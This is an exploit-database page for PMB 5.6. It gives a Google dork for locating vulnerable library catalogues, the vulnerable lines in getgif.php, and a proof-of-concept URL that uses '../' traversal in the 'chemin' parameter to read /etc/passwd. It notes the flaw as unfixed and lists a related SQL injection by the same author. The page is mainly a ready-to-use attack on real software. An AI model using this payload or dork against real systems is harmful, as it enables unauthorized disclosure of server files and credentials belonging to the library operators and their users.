Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
Author
41-trk
Platform
php
Release date
2020-11-16
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | # Exploit Title: PMB 5.6 - 'chemin' Local File Disclosure # Date: 2020-10-13 # Google Dork: inurl:opac_css # Exploit Author: 41-trk (Tarik Bakir) # Vendor Homepage: http://www.sigb.net # Software Link: http://forge.sigb.net/redmine/projects/pmb/files # Affected versions : <= 5.6 # Tested on: Ubuntu 18.04.1 The PMB Gif Image is not sanitizing the 'chemin', which leads to Local File Disclosure. As of today (2020-10-13) this issue is unfixed. Vulnerable code: (getgif.php ) line 55 $fp2=@fopen($chemin, "rb"); line 68 fpassthru($fp) ========================= Proof-of-Concept =================================================== http://127.0.0.1:2121/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-11-16 | "PMB 5.6 - 'chemin' Local File Disclosure" | webapps | php | 41-trk |
2020-04-21 | "PMB 5.6 - 'logid' SQL Injection" | webapps | php | 41-trk |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49054/?format=json')
For full documentation follow the link above